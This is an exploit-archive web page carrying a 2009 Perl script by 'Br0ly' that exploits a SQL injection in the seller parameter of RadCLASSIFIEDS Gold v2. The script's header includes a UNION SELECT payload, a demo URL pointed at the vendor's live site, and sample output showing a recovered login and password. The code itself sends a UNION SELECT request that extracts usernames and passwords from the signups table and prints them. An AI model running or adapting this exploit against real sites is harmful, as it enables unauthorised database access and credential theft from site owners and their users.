首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RadCLASSIFIEDS Gold v2 (seller) Remote SQL Injection Exploit
来源:br0ly[dot]Code[at]gmail[dot]com 作者:Br0ly 发布时间:2009-06-02  

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: RadCLASSIFIEDS Gold v2
#| -Site: http://radscripts.com/
#| -Site Demo: http://www.radclassifieds.com
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , xs86 , str0ke, 0ut0fBound , c0d3_z3r0
#|
#| -p0c:
#| -SQL INJECTION:
#| 
#|  -9999+union+all+select+0,1--
#|
#| - Demo ONline:
#|
#| -> http://www.radclassifieds.com/index.php?a=search&type=Any&search=1&seller=-9999+union+all+select+@@version,1--
#| 
#|
#| -Exploit: Demo:
#|
#|perl radclassifieds.txt http://www.radclassifieds.com/
#|
#|  --------------------------------------
#|   -RadCLASSIFIEDS                     
#|   -Sql Injection                      
#|   -by Br0ly                           
#|  --------------------------------------
#|
#|[+] Getting LOGIN and PASS
#|[+] LOGIN   = chub
#|[+] PASS    = chub
#|
#|
#| OBS: This IS only a Demo..
#|
#|
  use IO::Socket::INET;
  use LWP::UserAgent;
 
   my $host    = $ARGV[0];
   my $sql_path = "/index.php?a=search&type=Any&search=1&seller=";
   
 
  if (@ARGV < 1) {
      &banner();
      &help("-1");
  }

  elsif(cheek($host) == 1) {
   &banner();
   &xploit($host,$sql_path);
  }
 
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {

      my $host     = $_[0];
      my $sql_path = $_[1];

      print "[+] Getting LOGIN and PASS\n";

      my $sql_atk = $host.$sql_path."-9999+union+all+select+concat(0x6272306c79,0x3a,user,0x3a,password,0x3a,0x6272306c79),1+from+radclassifieds_signups--";
      print "$sql_atk";
      my $sql_get = get_url($sql_atk);
      my $connect = tag($sql_get);
     
      if($connect =~ /br0ly:(.+):(.+):br0ly/) {
 
        print "[+] LOGIN   = $1\n";
 print "[+] PASS    = $2\n";
   
      }

      else {
 print "[-] Exploit, Fail\n";
      }
 }

   sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(5);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub cheek() {
    my $host  = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
   
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/RadCLASSIFIEDS/\n\n";
    print "    Ex:     perl $0 http://localhost/RadCLASSIFIEDS/\n\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -RadCLASSIFIEDS                      \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EXPLOIT Online Grades & Attend
·Roxio CinePlayer 3.2 (IAManage
·ICQ 6.5 URL Search Hook / ICQT
·Unclassified NewsBoard 1.6.4 M
·Apache mod_dav / svn Remote De
·linux/x86 Bind ASM Code Linux
·ZeusCart <= 2.3 (maincatid) SQ
·ASP Football Pool 2.3 Remote D
·ecshop 2.6.2 Multiple Remote C
·The Linksys WAG54G2 web manage
·Roxio CinePlayer 3.2 (SonicMed
·Apple iTunes 8.1.1 (ITMS) Mult
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved